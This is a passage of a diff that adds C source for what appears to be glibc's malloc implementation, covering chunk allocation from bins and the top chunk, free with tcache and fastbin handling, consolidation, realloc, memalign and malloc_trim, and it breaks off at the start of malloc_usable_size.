+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
